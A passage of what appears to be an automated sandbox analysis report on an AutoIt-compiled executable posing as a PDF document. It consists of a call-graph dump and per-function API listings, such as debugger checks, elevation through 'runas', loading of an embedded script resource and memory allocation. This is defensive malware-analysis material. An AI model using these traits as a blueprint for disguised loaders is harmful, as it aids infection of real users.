99384->99365 99384->99369 99384->99371 99384->99374 99384->99376 99384->99380 99385 757faf 59 API calls 99384->99385 99388 78e3eb _memmove 99384->99388 99397 7560cc 60 API calls 99384->99397 99398 755ea1 59 API calls Mailbox 99384->99398 99400 755fd2 60 API calls 99384->99400 99401 757a84 59 API calls 2 library calls 99384->99401 99386 75659b CharUpperBuffW 99385->99386 99386->99384 99387->99388 99388->99369 99388->99371 99389->99360 99390->99360 99391->99360 99393 770ff6 Mailbox 59 API calls 99392->99393 99394 757b9b 99393->99394 99395 758189 59 API calls 99394->99395 99396 757baa 99395->99396 99396->99384 99397->99384 99398->99384 99399->99372 99400->99384 99401->99384 99402->99377 99403->99379 99404->99372 99405->98002 99406->98003 99408 78d638 99407->99408 99409 754227 99407->99409 99408->99409 99410 78d641 DestroyIcon 99408->99410 99409->98009 99433 7b3226 62 API calls _W_store_winword 99409->99433 99410->99409 99412 754200 Mailbox 99411->99412 99413 754129 99411->99413 99412->98015 99414 757b76 59 API calls 99413->99414 99415 754137 99414->99415 99416 754144 99415->99416 99417 78d5dd LoadStringW 99415->99417 99418 757d2c 59 API calls 99416->99418 99419 78d5f7 99417->99419 99420 754159 99418->99420 99422 757c8e 59 API calls 99419->99422 99420->99419 99421 75416a 99420->99421 99423 754205 99421->99423 99424 754174 99421->99424 99427 78d601 99422->99427 99426 7581a7 59 API calls 99423->99426 99425 757c8e 59 API calls 99424->99425 99430 75417e _memset _wcscpy 99425->99430 99426->99430 99428 757e0b 59 API calls 99427->99428 99427->99430 99429 78d623 99428->99429 99432 757e0b 59 API calls 99429->99432 99431 7541e6 Shell_NotifyIconW 99430->99431 99431->99412 99432->99430 99433->98009 99435 75e5b1 99434->99435 99436 75e59d 99434->99436 99501 7ba0b5 89 API calls 4 library calls 99435->99501 99500 75e060 331 API calls 2 library calls 99436->99500 99439 75e5a8 99439->98091 99440 793ece 99440->99440 99442 75f7b0 99441->99442 99443 75f61a 99441->99443 99446 757f41 59 API calls 99442->99446 99444 794848 99443->99444 99445 75f626 99443->99445 99596 7cbf80 331 API calls Mailbox 99444->99596 99594 75f3f0 331 API calls 2 library calls 99445->99594 99452 75f6ec Mailbox 99446->99452 99449 794856 99453 75f790 99449->99453 99597 7ba0b5 89 API calls 4 library calls 99449->99597 99451 75f65d 99451->99449 99451->99452 99451->99453 99459 754faa 84 API calls 99452->99459 99502 7b3e73 99452->99502 99505 7c474d 99452->99505 99514 7bcde5 99452->99514 99453->98091 99455 75f743 99455->99453 99595 759df0 59 API calls Mailbox 99455->99595 99459->99455 99460->98091 99461->98091 99462->98091 99463->98021 99464->98026 99465->98091 99466->98028 99467->98028 99468->98028 99469->98091 99470->98091 99471->98091 99473 7599b1 99472->99473 99482 7599ab 99472->99482 99474 7599f9 99473->99474 99475 7599b7 __itow 99473->99475 99476 78f9fc __i64tow 99473->99476 99481 78f903 99473->99481 99752 7738d8 83 API calls 3 library calls 99474->99752 99479 770ff6 Mailbox 59 API calls 99475->99479 99480 7599d1 99479->99480 99480->99482 99484 757f41 59 API calls 99480->99484 99483 770ff6 Mailbox 59 API calls 99481->99483 99488 78f97b Mailbox _wcscpy 99481->99488 99482->98091 99485 78f948 99483->99485 99484->99482 99486 770ff6 Mailbox 59 API calls 99485->99486 99487 78f96e 99486->99487 99487->99488 99489 757f41 59 API calls 99487->99489 99753 7738d8 83 API calls 3 library calls 99488->99753 99489->99488 99490->98091 99491->98091 99492->98091 99493->98077 99494->98077 99495->98077 99496->98077 99497->98077 99498->98077 99499->98077 99500->99439 99501->99440 99598 7b4696 GetFileAttributesW 99502->99598 99506 759997 84 API calls 99505->99506 99507 7c4787 99506->99507 99508 7563a0 94 API calls 99507->99508 99509 7c4797 99508->99509 99512 7c47bc 99509->99512 99602 75a000 99509->99602 99513 7c47c0 99512->99513 99625 759bf8 59 API calls Mailbox 99512->99625 99513->99455 99515 7577c7 59 API calls 99514->99515 99516 7bce1a 99515->99516 99517 7577c7 59 API calls 99516->99517 99518 7bce23 99517->99518 99519 7bce37 99518->99519 99741 759c9c 59 API calls 99518->99741 99521 759997 84 API calls 99519->99521 99522 7bce54 99521->99522 99523 7bce76 99522->99523 99524 7bcf55 99522->99524 99531 7bcf85 Mailbox 99522->99531 99526 759997 84 API calls 99523->99526 99525 754f3d 136 API calls 99524->99525 99531->99455 99594->99451 99595->99455 99596->99449 99597->99453 99599 7b3e7a 99598->99599 99600 7b46b1 FindFirstFileW 99598->99600 99599->99455 99600->99599 99601 7b46c6 FindClose 99600->99601 99601->99599 99603 75a01f 99602->99603 99618 75a04d Mailbox 99602->99618 99604 770ff6 Mailbox 59 API calls 99603->99604 99604->99618 99605 772f80 67 API calls __cinit 99605->99618 99606 75b5d5 99607 7581a7 59 API calls 99606->99607 99620 75a1b7 99607->99620 99608 7577c7 59 API calls 99608->99618 99611 770ff6 59 API calls Mailbox 99611->99618 99613 79047f 99628 7ba0b5 89 API calls 4 library calls 99613->99628 99615 7581a7 59 API calls 99615->99618 99617 79048e 99617->99512 99618->99605 99618->99606 99618->99608 99618->99611 99618->99613 99618->99615 99619 7a7405 59 API calls 99618->99619 99618->99620 99621 790e00 99618->99621 99623 75b5da 99618->99623 99624 75a6ba 99618->99624 99626 75ca20 331 API calls 2 library calls 99618->99626 99627 75ba60 60 API calls Mailbox 99618->99627 99619->99618 99620->99512 99630 7ba0b5 89 API calls 4 library calls 99621->99630 99631 7ba0b5 89 API calls 4 library calls 99623->99631 99629 7ba0b5 89 API calls 4 library calls 99624->99629 99625->99513 99626->99618 99627->99618 99628->99617 99629->99620 99630->99623 99631->99620 99741->99519 99752->99475 99753->99476 99755 757dbf __wsetenvp 99754->99755 99756 758189 59 API calls 99755->99756 99757 757dd0 _memmove 99755->99757 99758 78f130 _memmove 99756->99758 99757->98112 99766 753633 99767 75366a 99766->99767 99768 7536e7 99767->99768 99769 753688 99767->99769 99810 7536e5 99767->99810 99771 78d31c 99768->99771 99772 7536ed 99768->99772 99773 753695 99769->99773 99774 75375d PostQuitMessage 99769->99774 99770 7536ca DefWindowProcW 99807 7536d8 99770->99807 99816 7611d0 10 API calls Mailbox 99771->99816 99775 753715 SetTimer RegisterWindowMessageW 99772->99775 99776 7536f2 99772->99776 99777 7536a0 99773->99777 99778 78d38f 99773->99778 99774->99807 99782 75373e CreatePopupMenu 99775->99782 99775->99807 99780 78d2bf 99776->99780 99781 7536f9 KillTimer 99776->99781 99783 753767 99777->99783 99784 7536a8 99777->99784 99820 7b2a16 71 API calls _memset 99778->99820 99787 78d2f8 MoveWindow 99780->99787 99788 78d2c4 99780->99788 99811 7544cb Shell_NotifyIconW _memset 99781->99811 99782->99807 99814 754531 64 API calls _memset 99783->99814 99790 7536b3 99784->99790 99791 78d374 99784->99791 99786 78d343 99817 7611f3 331 API calls Mailbox 99786->99817 99787->99807 99795 78d2c8 99788->99795 99796 78d2e7 SetFocus 99788->99796 99798 7536be 99790->99798 99799 75374b 99790->99799 99791->99770 99819 7a817e 59 API calls Mailbox 99791->99819 99792 78d3a1 99792->99770 99792->99807 99795->99798 99800 78d2d1 99795->99800 99796->99807 99797 75370c 99812 753114 DeleteObject DestroyWindow Mailbox 99797->99812 99798->99770 99818 7544cb Shell_NotifyIconW _memset 99798->99818 99813 7545df 81 API calls _memset 99799->99813 99815 7611d0 10 API calls Mailbox 99800->99815 99805 75375b 99805->99807 99808 78d368 99809 7543db 68 API calls 99808->99809 99809->99810 99810->99770 99811->99797 99812->99807 99813->99805 99814->99805 99815->99807 99816->99786 99817->99798 99818->99808 99819->99810 99820->99792 99821 75107d 99826 7571eb 99821->99826 99823 75108c 99824 772f80 __cinit 67 API calls 99823->99824 99825 751096 99824->99825 99827 7571fb __ftell_nolock 99826->99827 99828 7577c7 59 API calls 99827->99828 99829 7572b1 99828->99829 99830 754864 61 API calls 99829->99830 99831 7572ba 99830->99831 99857 77074f 99831->99857 99834 757e0b 59 API calls 99835 7572d3 99834->99835 99836 753f84 59 API calls 99835->99836 99837 7572e2 99836->99837 99838 7577c7 59 API calls 99837->99838 99839 7572eb 99838->99839 99840 757eec 59 API calls 99839->99840 99841 7572f4 RegOpenKeyExW 99840->99841 99842 78ecda RegQueryValueExW 99841->99842 99843 757316 Mailbox 99841->99843 99844 78ed6c RegCloseKey 99842->99844 99845 78ecf7 99842->99845 99843->99823 99844->99843 99856 78ed7e _wcscat Mailbox __wsetenvp 99844->99856 99846 770ff6 Mailbox 59 API calls 99845->99846 99847 78ed10 99846->99847 99849 75538e 59 API calls 99847->99849 99848 757b52 59 API calls 99848->99856 99850 78ed1b RegQueryValueExW 99849->99850 99851 78ed38 99850->99851 99853 78ed52 99850->99853 99852 757d2c 59 API calls 99851->99852 99852->99853 99853->99844 99854 757f41 59 API calls 99854->99856 99855 753f84 59 API calls 99855->99856 99856->99843 99856->99848 99856->99854 99856->99855 99858 781b90 __ftell_nolock 99857->99858 99859 77075c GetFullPathNameW 99858->99859 99860 77077e 99859->99860 99861 757d2c 59 API calls 99860->99861 99862 7572c5 99861->99862 99862->99834 99863 18d23b0 99877 18d0000 99863->99877 99865 18d24a1 99880 18d22a0 99865->99880 99883 18d34d0 GetPEB 99877->99883 99879 18d068b 99879->99865 99881 18d22a9 Sleep 99880->99881 99882 18d22b7 99881->99882 99884 18d34fa 99883->99884 99884->99879 99885 75e608 99888 75d260 99885->99888 99887 75e616 99889 75d27d 99888->99889 99917 75d4dd 99888->99917 99890 792abb 99889->99890 99891 792b0a 99889->99891 99920 75d2a4 99889->99920 99894 792abe 99890->99894 99900 792ad9 99890->99900 99932 7ca6fb 331 API calls __cinit 99891->99932 99895 792aca 99894->99895 99894->99920 99930 7cad0f 331 API calls 99895->99930 99896 772f80 __cinit 67 API calls 99896->99920 99899 75d6ab 99899->99887 99900->99917 99931 7cb1b7 331 API calls 3 library calls 99900->99931 99901 75d594 99924 758bb2 68 API calls 99901->99924 99902 792cdf 99902->99902 99906 75d5a3 99906->99887 99907 792c26 99936 7caa66 89 API calls 99907->99936 99911 758620 69 API calls 99911->99920 99917->99899 99937 7ba0b5 89 API calls 4 library calls 99917->99937 99918 75a000 331 API calls 99918->99920 99919 7581a7 59 API calls 99919->99920 99920->99896 99920->99899 99920->99901 99920->99907 99920->99911 99920->99917 99920->99918 99920->99919 99922 7588a0 68 API calls __cinit 99920->99922 99923 7586a2 68 API calls 99920->99923 99925 75859a 68 API calls 99920->99925 99926 75d0dc 331 API calls 99920->99926 99927 759f3a 59 API calls Mailbox 99920->99927 99928 75d060 89 API calls 99920->99928 99929 75cedd 331 API calls 99920->99929 99933 758bb2 68 API calls 99920->99933 99934 759e9c 60 API calls Mailbox 99920->99934 99935 7a6d03 60 API calls 99920->99935 99922->99920 99923->99920 99924->99906 99925->99920 99926->99920 99927->99920 99928->99920 99929->99920 99930->99899 99931->99917 99932->99920 99933->99920 99934->99920 99935->99920 99936->99917 99937->99902 99938 790226 99944 75ade2 Mailbox 99938->99944 99940 790c86 99960 7a66f4 59 API calls Mailbox 99940->99960 99942 790c8f 99944->99940 99944->99942 99945 7900e0 VariantClear 99944->99945 99946 75b6c1 99944->99946 99948 7c474d 331 API calls 99944->99948 99951 7ce24b 99944->99951 99954 7ce237 99944->99954 99957 759df0 59 API calls Mailbox 99944->99957 99958 7a7405 59 API calls 99944->99958 99945->99944 99959 7ba0b5 89 API calls 4 library calls 99946->99959 99948->99944 99961 7ccdf1 99951->99961 99953 7ce25b 99953->99944 99955 7ccdf1 130 API calls 99954->99955 99956 7ce247 99955->99956 99956->99944 99957->99944 99958->99944 99959->99940 99960->99942 99962 759997 84 API calls 99961->99962 99963 7cce2e 99962->99963 99986 7cce75 Mailbox 99963->99986 99999 7cdab9 99963->99999 99965 7cd0cd 99966 7cd242 99965->99966 99970 7cd0db 99965->99970 100038 7cdbdc 92 API calls Mailbox 99966->100038 99969 7cd251 99969->99970 99971 7cd25d 99969->99971 100012 7ccc82 99970->100012 99971->99986 99972 759997 84 API calls 99990 7ccec6 Mailbox 99972->99990 99977 7cd114 100027 770e48 99977->100027 99980 7cd12e 100033 7ba0b5 89 API calls 4 library calls 99980->100033 99981 7cd147 99983 75942e 59 API calls 99981->99983 99985 7cd153 99983->99985 99984 7cd139 GetCurrentProcess TerminateProcess 99984->99981 99987 7591b0 59 API calls 99985->99987 99986->99953 99988 7cd169 99987->99988 99998 7cd190 99988->99998 100034 758ea0 59 API calls Mailbox 99988->100034 99990->99965 99990->99972 99990->99986 100031 7bf835 59 API calls 2 library calls 99990->100031 100032 7cd2f3 61 API calls 2 library calls 99990->100032 99991 7cd2b8 99991->99986 99994 7cd2cc FreeLibrary 99991->99994 99992 7cd17f 100035 7cd95d 107 API calls _free 99992->100035 99994->99986 99998->99991 100036 758ea0 59 API calls Mailbox 99998->100036 100037 759e9c 60 API calls Mailbox 99998->100037 100039 7cd95d 107 API calls _free 99998->100039 100000 757faf 59 API calls 99999->100000 100001 7cdad4 CharLowerBuffW 100000->100001 100040 7af658 100001->100040 100005 7577c7 59 API calls 100007 7cdb0d 100005->100007 100006 7cdb6c Mailbox 100006->99990 100008 7579ab 59 API calls 100007->100008 100009 7cdb24 100008->100009 100010 757e8c 59 API calls 100009->100010 100011 7cdb30 Mailbox 100010->100011 100011->100006 100047 7cd2f3 61 API calls 2 library calls 100011->100047 100013 7ccc9d 100012->100013 100017 7cccf2 100012->100017 100014 770ff6 Mailbox 59 API calls 100013->100014 100015 7cccbf 100014->100015 100016 770ff6 Mailbox 59 API calls 100015->100016 100015->100017 100016->100015 100018 7cdd64 100017->100018 100019 7cdf8d Mailbox 100018->100019 100025 7cdd87 _strcat _wcscpy __wsetenvp 100018->100025 100019->99977 100020 759c9c 59 API calls 100020->100025 100021 759cf8 59 API calls 100021->100025 100022 759d46 59 API calls 100022->100025 100023 759997 84 API calls 100023->100025 100024 77594c 58 API calls __malloc_crt 100024->100025 100025->100019 100025->100020 100025->100021 100025->100022 100025->100023 100025->100024 100050 7b5b29 61 API calls 2 library calls 100025->100050 100029 770e5d 100027->100029 100028 770ef5 VirtualAlloc 100030 770ec3 100028->100030 100029->100028 100029->100030 100030->99980 100030->99981 100031->99990 100032->99990 100033->99984 100034->99992 100035->99998 100036->99998 100037->99998 100038->99969 100039->99998 100042 7af683 __wsetenvp 100040->100042 100041 7af6c2 100041->100005 100041->100011 100042->100041 100044 7af6b8 100042->100044 100046 7af769 100042->100046 100044->100041 100048 757a24 61 API calls 100044->100048 100046->100041 100049 757a24 61 API calls 100046->100049 100047->100006 100048->100044 100049->100046 100050->100025

                                                                                                                      Executed Functions

                                                                                                                      Function 00753B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B7A
                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00753B8C
                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,008162F8,008162E0,?,?), ref: 00753BFD
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                        • Part of subcall function 00760A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00753C26,008162F8,?,?,?), ref: 00760ACE
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00753C81
                                                                                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008093F0,00000010), ref: 0078D4BC
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,008162F8,?,?,?), ref: 0078D4F4
                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00805D40,008162F8,?,?,?), ref: 0078D57A
                                                                                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0078D581
                                                                                                                        • Part of subcall function 00753A58: GetSysColorBrush.USER32(0000000F), ref: 00753A62
                                                                                                                        • Part of subcall function 00753A58: LoadCursorW.USER32(00000000,00007F00), ref: 00753A71
                                                                                                                        • Part of subcall function 00753A58: LoadIconW.USER32(00000063), ref: 00753A88
                                                                                                                        • Part of subcall function 00753A58: LoadIconW.USER32(000000A4), ref: 00753A9A
                                                                                                                        • Part of subcall function 00753A58: LoadIconW.USER32(000000A2), ref: 00753AAC
                                                                                                                        • Part of subcall function 00753A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AD2
                                                                                                                        • Part of subcall function 00753A58: RegisterClassExW.USER32(?), ref: 00753B28
                                                                                                                        • Part of subcall function 007539E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A15
                                                                                                                        • Part of subcall function 007539E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A36
                                                                                                                        • Part of subcall function 007539E7: ShowWindow.USER32(00000000,?,?), ref: 00753A4A
                                                                                                                        • Part of subcall function 007539E7: ShowWindow.USER32(00000000,?,?), ref: 00753A53
                                                                                                                        • Part of subcall function 007543DB: _memset.LIBCMT ref: 00754401
                                                                                                                        • Part of subcall function 007543DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007544A6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                      • String ID: This is a third-party compiled AutoIt script.$runas$%~
                                                                                                                      • API String ID: 529118366-536648910
                                                                                                                      • Opcode ID: 88e49a1f7dc0b864396ba5c0b77d42194df6b2ec602e9329e9b5be74b51be76e
                                                                                                                      • Instruction ID: be11ced121b3d91d8a5131258f2307695bbd0e41bd63790213bebdb755f6577a
                                                                                                                      • Opcode Fuzzy Hash: 88e49a1f7dc0b864396ba5c0b77d42194df6b2ec602e9329e9b5be74b51be76e
                                                                                                                      • Instruction Fuzzy Hash: 9651D870D04248EACB11ABB4DC09DED7B7DFF04351B048169FC96A22E1EABC5A59CB21
                                                                                                                      Function 00754FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 943 754fe9-755001 CreateStreamOnHGlobal 944 755021-755026 943->944 945 755003-75501a FindResourceExW 943->945 946 78dd5c-78dd6b LoadResource 945->946 947 755020 945->947 946->947 948 78dd71-78dd7f SizeofResource 946->948 947->944 948->947 949 78dd85-78dd90 LockResource 948->949 949->947 950 78dd96-78dd9e 949->950 951 78dda2-78ddb4 950->951 951->947
                                                                                                                      APIs
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00754EEE,?,?,00000000,00000000), ref: 00754FF9
                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00754EEE,?,?,00000000,00000000), ref: 00755010
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F), ref: 0078DD60
                                                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F), ref: 0078DD75
                                                                                                                      • LockResource.KERNEL32(Nu,?,?,00754EEE,?,?,00000000,00000000,?,?,?,?,?,?,00754F8F,00000000), ref: 0078DD88
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                      • String ID: SCRIPT$Nu
                                                                                                                      • API String ID: 3051347437-3259838383
                                                                                                                      • Opcode ID: 6d83dca23b2cbe05e8072746c874169e55b33d6c15f6910cb88ae2d64fe27bf8
                                                                                                                      • Instruction ID: a4704f59bdaed6061088ebfbb682a821a5678d8df2f85bebf4b8bc81eef094aa
                                                                                                                      • Opcode Fuzzy Hash: 6d83dca23b2cbe05e8072746c874169e55b33d6c15f6910cb88ae2d64fe27bf8
                                                                                                                      • Instruction Fuzzy Hash: AA115E75240700AFD7219B65DC58F6B7BB9EBC9B11F14816DF80AC62A0DBA6EC048660
                                                                                                                      Function 00754AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1007 754afe-754b5e call 7577c7 GetVersionExW call 757d2c 1012 754b64 1007->1012 1013 754c69-754c6b 1007->1013 1015 754b67-754b6c 1012->1015 1014 78db90-78db9c 1013->1014 1016 78db9d-78dba1 1014->1016 1017 754c70-754c71 1015->1017 1018 754b72 1015->1018 1020 78dba3 1016->1020 1021 78dba4-78dbb0 1016->1021 1019 754b73-754baa call 757e8c call 757886 1017->1019 1018->1019 1029 78dc8d-78dc90 1019->1029 1030 754bb0-754bb1 1019->1030 1020->1021 1021->1016 1023 78dbb2-78dbb7 1021->1023 1023->1015 1025 78dbbd-78dbc4 1023->1025 1025->1014 1027 78dbc6 1025->1027 1031 78dbcb-78dbce 1027->1031 1032 78dca9-78dcad 1029->1032 1033 78dc92 1029->1033 1030->1031 1034 754bb7-754bc2 1030->1034 1035 754bf1-754c08 GetCurrentProcess IsWow64Process 1031->1035 1036 78dbd4-78dbf2 1031->1036 1041 78dc98-78dca1 1032->1041 1042 78dcaf-78dcb8 1032->1042 1037 78dc95 1033->1037 1038 78dc13-78dc19 1034->1038 1039 754bc8-754bca 1034->1039 1043 754c0d-754c1e 1035->1043 1044 754c0a 1035->1044 1036->1035 1040 78dbf8-78dbfe 1036->1040 1037->1041 1049 78dc1b-78dc1e 1038->1049 1050 78dc23-78dc29 1038->1050 1045 754bd0-754bd3 1039->1045 1046 78dc2e-78dc3a 1039->1046 1047 78dc08-78dc0e 1040->1047 1048 78dc00-78dc03 1040->1048 1041->1032 1042->1037 1051 78dcba-78dcbd 1042->1051 1052 754c20-754c30 call 754c95 1043->1052 1053 754c89-754c93 GetSystemInfo 1043->1053 1044->1043 1054 78dc5a-78dc5d 1045->1054 1055 754bd9-754be8 1045->1055 1057 78dc3c-78dc3f 1046->1057 1058 78dc44-78dc4a 1046->1058 1047->1035 1048->1035 1049->1035 1050->1035 1051->1041 1064 754c32-754c3f call 754c95 1052->1064 1065 754c7d-754c87 GetSystemInfo 1052->1065 1056 754c56-754c66 1053->1056 1054->1035 1063 78dc63-78dc78 1054->1063 1060 78dc4f-78dc55 1055->1060 1061 754bee 1055->1061 1057->1035 1058->1035 1060->1035 1061->1035 1066 78dc7a-78dc7d 1063->1066 1067 78dc82-78dc88 1063->1067 1072 754c76-754c7b 1064->1072 1073 754c41-754c45 GetNativeSystemInfo 1064->1073 1068 754c47-754c4b 1065->1068 1066->1035 1067->1035 1068->1056 1070 754c4d-754c50 FreeLibrary 1068->1070 1070->1056 1072->1073 1073->1068
                                                                                                                      APIs
                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00754B2B
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                      • GetCurrentProcess.KERNEL32(?,007DFAEC,00000000,00000000,?), ref: 00754BF8
                                                                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00754BFF
                                                                                                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00754C45
                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00754C50
                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00754C81
                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00754C8D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1986165174-0
                                                                                                                      • Opcode ID: 8e4a06c94404785f357898f638efb16836799ba174e04a28b46f89d669f40b1e
                                                                                                                      • Instruction ID: f027bf86429bec68dc5a4df62277296c7a6869378779e5eedee72b68b162d744
                                                                                                                      • Opcode Fuzzy Hash: 8e4a06c94404785f357898f638efb16836799ba174e04a28b46f89d669f40b1e
                                                                                                                      • Instruction Fuzzy Hash: 0B91F47158A7C0EEC731DB6884511EABFE5AF2A305B484D9ED4CB83A41D268E94CC729
                                                                                                                      Function 007B4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,0078E7C1), ref: 007B46A6
                                                                                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 007B46B7
                                                                                                                      • FindClose.KERNEL32(00000000), ref: 007B46C7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileFind$AttributesCloseFirst
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 48322524-0
                                                                                                                      • Opcode ID: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
                                                                                                                      • Instruction ID: 771de4351ae7403efb3d2b186be8361d623f3431d2dd2cc155038801ed95bb84
                                                                                                                      • Opcode Fuzzy Hash: 30e98b3d14e12b28e9cb9d5a9e41e5e09ad428f7b9770993f1acea55547e2f8e
                                                                                                                      • Instruction Fuzzy Hash: 01E0D8314114005B86106738EC4D4EE776C9E06339F104716F836C10E0E7B869608599
                                                                                                                      Function 00760B30 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760BBB
                                                                                                                      • timeGetTime.WINMM ref: 00760E76
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00760FB3
                                                                                                                      • TranslateMessage.USER32(?), ref: 00760FC7
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00760FD5
